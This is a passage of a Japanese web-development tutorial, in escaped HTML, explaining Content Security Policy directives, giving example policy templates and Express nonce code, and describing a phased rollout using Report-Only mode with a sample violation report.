width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u8272\u3005\u306a\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u304c\u3042\u308b\u3093\u3067\u3059\u306d\uff01\u52c9\u5f37\u306b\u306a\u308a\u307e\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u4e3b\u8981\u306a\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u4e00\u89a7<\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6<\/th><th>\u5236\u5fa1\u5bfe\u8c61<\/th><th>\u8aac\u660e<\/th><\/tr><\/thead><tbody><tr><td><strong>default-src<\/strong><\/td><td>\u3059\u3079\u3066\u306e\u30ea\u30bd\u30fc\u30b9<\/td><td>\u4ed6\u306e\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u5024<\/td><\/tr><tr><td><strong>script-src<\/strong><\/td><td>JavaScript<\/td><td>\u30b9\u30af\u30ea\u30d7\u30c8\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>style-src<\/strong><\/td><td>CSS<\/td><td>\u30b9\u30bf\u30a4\u30eb\u30b7\u30fc\u30c8\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>img-src<\/strong><\/td><td>\u753b\u50cf<\/td><td>\u753b\u50cf\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>font-src<\/strong><\/td><td>\u30d5\u30a9\u30f3\u30c8<\/td><td>Web\u30d5\u30a9\u30f3\u30c8\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>connect-src<\/strong><\/td><td>\u901a\u4fe1<\/td><td>fetch\u3001XHR\u3001WebSocket\u306e\u63a5\u7d9a\u5148\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>media-src<\/strong><\/td><td>\u30e1\u30c7\u30a3\u30a2<\/td><td>\u97f3\u58f0\u30fb\u52d5\u753b\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>object-src<\/strong><\/td><td>\u30d7\u30e9\u30b0\u30a4\u30f3<\/td><td>&lt;object&gt;\u3001&lt;embed&gt;\u306e\u8aad\u307f\u8fbc\u307f\u5143\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>frame-src<\/strong><\/td><td>iframe<\/td><td>iframe\u3067\u8aad\u307f\u8fbc\u3080\u30da\u30fc\u30b8\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>base-uri<\/strong><\/td><td>&lt;base&gt;\u30bf\u30b0<\/td><td>&lt;base&gt;\u8981\u7d20\u306eURL\u3092\u5236\u9650<\/td><\/tr><tr><td><strong>form-action<\/strong><\/td><td>\u30d5\u30a9\u30fc\u30e0\u9001\u4fe1<\/td><td>\u30d5\u30a9\u30fc\u30e0\u306e\u9001\u4fe1\u5148\u3092\u5236\u9650<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u30bd\u30fc\u30b9\u5024\u306e\u6307\u5b9a\u65b9\u6cd5<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5404\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306b\u306f\u3001\u8a31\u53ef\u3059\u308b\u53d6\u5f97\u5143\uff08\u30bd\u30fc\u30b9\uff09\u3092\u6307\u5b9a\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>\u30bd\u30fc\u30b9\u5024<\/th><th>\u610f\u5473<\/th><th>\u4f8b<\/th><\/tr><\/thead><tbody><tr><td><strong>&#8216;self&#8217;<\/strong><\/td><td>\u81ea\u30b5\u30a4\u30c8\uff08\u540c\u4e00\u30aa\u30ea\u30b8\u30f3\uff09<\/td><td>https:\/\/example.com<\/td><\/tr><tr><td><strong>&#8216;none&#8217;<\/strong><\/td><td>\u3059\u3079\u3066\u62d2\u5426<\/td><td>&#8211;<\/td><\/tr><tr><td><strong>&#8216;unsafe-inline&#8217;<\/strong><\/td><td>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b3\u30fc\u30c9\u3092\u8a31\u53ef<\/td><td>&lt;script&gt;&#8230;&lt;\/script&gt;<\/td><\/tr><tr><td><strong>&#8216;unsafe-eval&#8217;<\/strong><\/td><td>eval()\u3092\u8a31\u53ef<\/td><td>eval(&#8216;code&#8217;)<\/td><\/tr><tr><td><strong>\u30c9\u30e1\u30a4\u30f3<\/strong><\/td><td>\u7279\u5b9a\u30c9\u30e1\u30a4\u30f3\u3092\u8a31\u53ef<\/td><td>https:\/\/cdn.example.com<\/td><\/tr><tr><td><strong>\u30ef\u30a4\u30eb\u30c9\u30ab\u30fc\u30c9<\/strong><\/td><td>\u30b5\u30d6\u30c9\u30e1\u30a4\u30f3\u5168\u4f53\u3092\u8a31\u53ef<\/td><td>https:\/\/*.example.com<\/td><\/tr><tr><td><strong>\u30b9\u30ad\u30fc\u30e0<\/strong><\/td><td>\u7279\u5b9a\u306e\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u8a31\u53ef<\/td><td>https:\u3001data:<\/td><\/tr><tr><td><strong>nonce-<\/strong><\/td><td>\u7279\u5b9a\u306e\u30b9\u30af\u30ea\u30d7\u30c8\/\u30b9\u30bf\u30a4\u30eb\u3092\u8a31\u53ef<\/td><td>nonce-abc123<\/td><\/tr><tr><td><strong>hash-<\/strong><\/td><td>\u30cf\u30c3\u30b7\u30e5\u5024\u304c\u4e00\u81f4\u3059\u308b\u30b3\u30fc\u30c9\u3092\u8a31\u53ef<\/td><td>sha256-abc&#8230;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c7\u30a3\u30ec\u30af\u30c6\u30a3\u30d6\u306e\u8a18\u8ff0\u4f8b<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; https:\/\/cdn.example.com;\n  style-src &#39;self&#39; &#39;unsafe-inline&#39;;\n  img-src &#39;self&#39; data: https:;\n  font-src &#39;self&#39; https:\/\/fonts.gstatic.com;\n  connect-src &#39;self&#39; https:\/\/api.example.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u3053\u306e\u8a2d\u5b9a\u306e\u610f\u5473\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>default-src &#8216;self&#8217;<\/strong>: \u30c7\u30d5\u30a9\u30eb\u30c8\u306f\u81ea\u30b5\u30a4\u30c8\u306e\u307f\u8a31\u53ef<\/li>\n\n\n\n<li><strong>script-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3068cdn.example.com\u306eJavaScript\u306e\u307f<\/li>\n\n\n\n<li><strong>style-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u306eCSS\u3068\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30bf\u30a4\u30eb<\/li>\n\n\n\n<li><strong>img-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3001data:\u30b9\u30ad\u30fc\u30e0\u3001\u3059\u3079\u3066\u306eHTTPS\u30b5\u30a4\u30c8\u306e\u753b\u50cf<\/li>\n\n\n\n<li><strong>font-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3068Google Fonts<\/li>\n\n\n\n<li><strong>connect-src<\/strong>: \u81ea\u30b5\u30a4\u30c8\u3068api.example.com\u3078\u306eAJAX\u901a\u4fe1<\/li>\n\n\n\n<li><strong>frame-src &#8216;none&#8217;<\/strong>: \u3059\u3079\u3066\u306eiframe\u8aad\u307f\u8fbc\u307f\u3092\u7981\u6b62<\/li>\n\n\n\n<li><strong>object-src &#8216;none&#8217;<\/strong>: Flash\u7b49\u306e\u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u7981\u6b62<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u5b9f\u8df5\u7684\u306aCSP\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u96c6<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"864\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006666-1.jpg\" alt=\"\" class=\"wp-image-13260\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006666-1.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006666-1-768x432.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-14.48.08.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306e\u5b9f\u8df5\u7684\u306a\u65b9\u6cd5\u3092\u77e5\u308a\u305f\u3044\u3067\u3059\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.11.23.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u826f\u3044\u5fc3\u304c\u3051\u3058\u3083\uff01\u3053\u3053\u3067\u306f\u3001\u7528\u9014\u5225\u306e\u5b9f\u8df5\u7684\u306aCSP\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\u3092\u7d39\u4ecb\u3059\u308b\u305e\u3002\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306b\u5fdc\u3058\u3066\u9078\u629e\u30fb\u30ab\u30b9\u30bf\u30de\u30a4\u30ba\u3059\u308b\u306e\u3058\u3083\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c81: \u6700\u3082\u53b3\u683c\u306aCSP\uff08\u9759\u7684\u30b5\u30a4\u30c8\u5411\u3051\uff09<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5916\u90e8\u30ea\u30bd\u30fc\u30b9\u3092\u4e00\u5207\u4f7f\u7528\u3057\u306a\u3044\u3001\u5b8c\u5168\u306b\u9759\u7684\u306aWeb\u30b5\u30a4\u30c8\u5411\u3051\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;none&#39;;\n  script-src &#39;self&#39;;\n  style-src &#39;self&#39;;\n  img-src &#39;self&#39;;\n  font-src &#39;self&#39;;\n  connect-src &#39;none&#39;;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7279\u5fb4\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6700\u3082\u5b89\u5168\u306a\u8a2d\u5b9a<\/li>\n\n\n\n<li>\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\/\u30b9\u30bf\u30a4\u30eb\u306f\u4f7f\u7528\u4e0d\u53ef<\/li>\n\n\n\n<li>\u5916\u90e8\u30ea\u30bd\u30fc\u30b9\uff08CDN\u3001API\uff09\u306f\u4f7f\u7528\u4e0d\u53ef<\/li>\n\n\n\n<li>\u30d6\u30ed\u30b0\u3084\u30b3\u30fc\u30dd\u30ec\u30fc\u30c8\u30b5\u30a4\u30c8\u306b\u6700\u9069<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c82: CDN\u3092\u4f7f\u7528\u3059\u308b\u4e00\u822c\u7684\u306aWeb\u30b5\u30a4\u30c8<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Google Fonts\u3001CDN\u304b\u3089\u306eJavaScript\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; https:\/\/cdn.jsdelivr.net https:\/\/cdnjs.cloudflare.com;\n  style-src &#39;self&#39; https:\/\/fonts.googleapis.com;\n  img-src &#39;self&#39; data: https:;\n  font-src &#39;self&#39; https:\/\/fonts.gstatic.com;\n  connect-src &#39;self&#39;;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;\n  upgrade-insecure-requests;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7279\u5fb4\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4e3b\u8981CDN\u304b\u3089\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u8aad\u307f\u8fbc\u307f\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>Google Fonts\u3092\u4f7f\u7528\u53ef\u80fd<\/li>\n\n\n\n<li>HTTPS\u306e\u753b\u50cf\u3092\u5168\u8a31\u53ef<\/li>\n\n\n\n<li>upgrade-insecure-requests\u3067HTTP\u3092\u81ea\u52d5\u7684\u306bHTTPS\u306b<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c83: Google Analytics\u3084Google Tag Manager\u3092\u4f7f\u7528<\/h3>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39; https:\/\/www.googletagmanager.com https:\/\/www.google-analytics.com;\n  style-src &#39;self&#39; &#39;unsafe-inline&#39;;\n  img-src &#39;self&#39; data: https:\/\/www.google-analytics.com https:\/\/www.googletagmanager.com;\n  font-src &#39;self&#39;;\n  connect-src &#39;self&#39; https:\/\/www.google-analytics.com https:\/\/analytics.google.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;<\/code><\/pre><\/div>\n\n\n\n<p class=\"is-style-big_icon_caution wp-block-paragraph\"><strong>\u6ce8\u610f\u70b9\uff1a<\/strong><br><strong>\u30fb<\/strong>Google Tag Manager\u306f\u52d5\u7684\u306b\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3081\u3001&#8217;unsafe-eval&#8217;\u304c\u5fc5\u8981\u306a\u5834\u5408\u304c\u3042\u308b<strong><br>\u30fb<\/strong>\u3088\u308a\u53b3\u683c\u306b\u3059\u308b\u306b\u306f\u3001nonce\u3092\u4f7f\u7528\u3057\u3066\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u500b\u5225\u8a31\u53ef<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c84: React\/Vue\u306a\u3069\u306e\u30e2\u30c0\u30f3\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">SPA\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39;;\n  style-src &#39;self&#39; &#39;unsafe-inline&#39;;\n  img-src &#39;self&#39; data: blob: https:;\n  font-src &#39;self&#39; data:;\n  connect-src &#39;self&#39; https:\/\/api.example.com;\n  frame-src &#39;none&#39;;\n  object-src &#39;none&#39;;\n  base-uri &#39;self&#39;;\n  form-action &#39;self&#39;;\n  worker-src &#39;self&#39; blob:;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u7279\u5fb4\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>style-src\u306b&#8217;unsafe-inline&#8217;\uff08CSS-in-JS\u3067\u5fc5\u8981\uff09<\/li>\n\n\n\n<li>img-src\u306bblob:\uff08\u52d5\u7684\u753b\u50cf\u751f\u6210\u3067\u5fc5\u8981\uff09<\/li>\n\n\n\n<li>worker-src\u306bblob:\uff08Web Worker\u3067\u5fc5\u8981\uff09<\/li>\n\n\n\n<li>connect-src\u306bAPI\u901a\u4fe1\u5148\u3092\u6307\u5b9a<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">\u30c6\u30f3\u30d7\u30ec\u30fc\u30c85: nonce\u3092\u4f7f\u7528\u3057\u305f\u6700\u9ad8\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ec\u30d9\u30eb<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3057\u3064\u3064\u3001\u6700\u9ad8\u30ec\u30d9\u30eb\u306e\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3092\u5b9f\u73fe\uff1a<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30b5\u30fc\u30d0\u30fc\u5074\uff08Node.js\/Express\uff09\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>const crypto = require(&#39;crypto&#39;);\n\napp.use((req, res, next) =&gt; {\n  \/\/ \u30ea\u30af\u30a8\u30b9\u30c8\u3054\u3068\u306b\u30e9\u30f3\u30c0\u30e0\u306anonce\u3092\u751f\u6210\n  const nonce = crypto.randomBytes(16).toString(&#39;base64&#39;);\n  res.locals.nonce = nonce;\n\n  res.setHeader(\n    &#39;Content-Security-Policy&#39;,\n    `default-src &#39;self&#39;; script-src &#39;self&#39; &#39;nonce-${nonce}&#39;; style-src &#39;self&#39; &#39;nonce-${nonce}&#39;; object-src &#39;none&#39;;`\n  );\n  next();\n});<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>HTML\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-html\" data-lang=\"HTML\"><code>&lt;!-- nonce\u3092\u6307\u5b9a\u3057\u3066\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8a31\u53ef --&gt;\n&lt;script nonce=&quot;&lt;%= nonce %&gt;&quot;&gt;\n  console.log(&#39;\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u5b9f\u884c\u3055\u308c\u307e\u3059&#39;);\n&lt;\/script&gt;\n\n&lt;!-- nonce\u304c\u306a\u3044\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u30d6\u30ed\u30c3\u30af\u3055\u308c\u308b --&gt;\n&lt;script&gt;\n  console.log(&#39;\u3053\u306e\u30b9\u30af\u30ea\u30d7\u30c8\u306f\u30d6\u30ed\u30c3\u30af\u3055\u308c\u307e\u3059&#39;);\n&lt;\/script&gt;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>nonce\u306e\u5229\u70b9\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>&#8216;unsafe-inline&#8217;\u3092\u4f7f\u308f\u305a\u306b\u30a4\u30f3\u30e9\u30a4\u30f3\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u8a31\u53ef<\/li>\n\n\n\n<li>\u653b\u6483\u8005\u306fnonce\u3092\u4e88\u6e2c\u3067\u304d\u306a\u3044\u305f\u3081\u3001XSS\u653b\u6483\u3092\u9632\u3052\u308b<\/li>\n\n\n\n<li>\u30ea\u30af\u30a8\u30b9\u30c8\u3054\u3068\u306b\u7570\u306a\u308bnonce\u3092\u751f\u6210\u3059\u308b\u3053\u3068\u304c\u91cd\u8981<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">CSP\u306e\u6bb5\u968e\u7684\u306a\u5c0e\u5165\u65b9\u6cd5<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img decoding=\"async\" width=\"1536\" height=\"1024\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668.jpg\" alt=\"\" class=\"wp-image-13262\" srcset=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668.jpg 1536w, https:\/\/withcode.tech\/media\/wp-content\/uploads\/2026\/02\/1000006668-768x512.jpg 768w\" sizes=\"(max-width: 1536px) 100vw, 1536px\" \/><\/figure>\n<\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-left\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.00.55.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u751f\u5f92<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>CSP\u306e\u8a2d\u5b9a\u3001\u3044\u308d\u3044\u308d\u306a\u7a2e\u985e\u304c\u3042\u3063\u3066\u8907\u96d1\u3067\u3059\u306d&#8230;\u5b9f\u969b\u306b\u3069\u3053\u304b\u3089\u59cb\u3081\u308c\u3070\u826f\u3044\u3067\u3057\u3087\u3046\u304b\uff1f<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n<div class=\"swell-block-balloon\"><div class=\"c-balloon -bln-right\" data-col=\"gray\"><div class=\"c-balloon__icon -square\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/withcode.tech\/media\/wp-content\/uploads\/2025\/06\/\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8-2025-06-15-15.12.07.jpg\" alt=\"\" class=\"c-balloon__iconImg\" width=\"80px\" height=\"80px\"><span class=\"c-balloon__iconName\">\u30da\u30f3\u535a\u58eb<\/span><\/div><div class=\"c-balloon__body -speaking -border-none\"><div class=\"c-balloon__text\">\n<p><strong>\u307e\u305a\u306fReport-Only\u30e2\u30fc\u30c9\u3067\u69d8\u5b50\u3092\u898b\u308b\u306e\u304c\u304a\u3059\u3059\u3081\u3058\u3083\uff01\u3044\u304d\u306a\u308a\u53b3\u683c\u306a\u8a2d\u5b9a\u306b\u3059\u308b\u3068\u3001\u30b5\u30a4\u30c8\u304c\u52d5\u304b\u306a\u304f\u306a\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u304b\u3089\u306e\u3046\u3002\u6bb5\u968e\u7684\u306b\u9032\u3081\u308b\u3053\u3068\u304c\u6210\u529f\u306e\u79d8\u8a23\u3058\u3083\u305e\uff01<\/strong><\/p>\n<span class=\"c-balloon__shapes\"><span class=\"c-balloon__before\"><\/span><span class=\"c-balloon__after\"><\/span><\/span><\/div><\/div><\/div><\/div>\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba1: Report-Only\u30e2\u30fc\u30c9\u3067\u5f71\u97ff\u3092\u8abf\u67fb<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Content-Security-Policy-Report-Only\u30d8\u30c3\u30c0\u30fc\u3092\u4f7f\u7528\u3059\u308b\u3068\u3001\u30dd\u30ea\u30b7\u30fc\u9055\u53cd\u3092\u30d6\u30ed\u30c3\u30af\u305b\u305a\u3001\u30ec\u30dd\u30fc\u30c8\u306e\u307f\u9001\u4fe1\u3057\u307e\u3059\u3002<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-plain\"><code>Content-Security-Policy-Report-Only:\n  default-src &#39;self&#39;;\n  script-src &#39;self&#39;;\n  report-uri https:\/\/example.com\/csp-report;<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30ec\u30dd\u30fc\u30c8\u30a8\u30f3\u30c9\u30dd\u30a4\u30f3\u30c8\u306e\u5b9f\u88c5\uff08Node.js\/Express\uff09\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-js\" data-lang=\"JavaScript\"><code>app.post(&#39;\/csp-report&#39;, express.json({ type: &#39;application\/csp-report&#39; }), (req, res) =&gt; {\n  console.log(&#39;CSP Violation:&#39;, JSON.stringify(req.body, null, 2));\n\n  \/\/ \u30ec\u30dd\u30fc\u30c8\u3092\u30ed\u30b0\u30d5\u30a1\u30a4\u30eb\u3084\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u306b\u4fdd\u5b58\n  \/\/ \u307e\u305f\u306f\u5916\u90e8\u30b5\u30fc\u30d3\u30b9\uff08Sentry\u3001Report URI\u306a\u3069\uff09\u306b\u9001\u4fe1\n\n  res.status(204).end();\n});<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30ec\u30dd\u30fc\u30c8\u306e\u5185\u5bb9\u4f8b\uff1a<\/strong><\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers lang-json\" data-lang=\"JSON\"><code>{\n  &quot;csp-report&quot;: {\n    &quot;document-uri&quot;: &quot;https:\/\/example.com\/page&quot;,\n    &quot;violated-directive&quot;: &quot;script-src &#39;self&#39;&quot;,\n    &quot;blocked-uri&quot;: &quot;https:\/\/evil.com\/malicious.js&quot;,\n    &quot;line-number&quot;: 42,\n    &quot;column-number&quot;: 5,\n    &quot;source-file&quot;: &quot;https:\/\/example.com\/page&quot;\n  }\n}<\/code><\/pre><\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>\u30d5\u30a7\u30fc\u30ba1\u306e\u624b\u9806\uff1a<\/strong><\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Report-Only\u30e2\u30fc\u30c9\u3067\u53b3\u683c\u306a\u30dd\u30ea\u30b7\u30fc\u3092\u8a2d\u5b9a<\/li>\n\n\n\n<li>1-2\u9031\u9593\u904b\u7528\u3057\u3066\u30ec\u30dd\u30fc\u30c8\u3092\u53ce\u96c6<\/li>\n\n\n\n<li>\u9055\u53cd\u5185\u5bb9\u3092\u5206\u6790\u3057\u3001\u6b63\u5f53\u306a\u30ea\u30bd\u30fc\u30b9\u3092\u7279\u5b9a<\/li>\n\n\n\n<li>\u30dd\u30ea\u30b7\u30fc\u3092\u8abf\u6574\u3057\u3066\u518d\u30c6\u30b9\u30c8<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">\u30d5\u30a7\u30fc\u30ba2: \u7de9\u3044\u30dd\u30ea\u30b7\u30fc\u3067\u672c\u756a\u9069\u7528<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Report-Only\u30e2\u30fc\u30c9\u3067\u306e\u8abf\u67fb\u304c\u5b8c\u4e86\u3057\u305f\u3089\u3001\u7de9\u3081\u306e\u30dd\u30ea\u30b7\u30fc\u304b\u3089\u672c\u756a\u9069\u7528\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n<div class=\"hcb_wrap\"><pre class=\"prism line-numbers 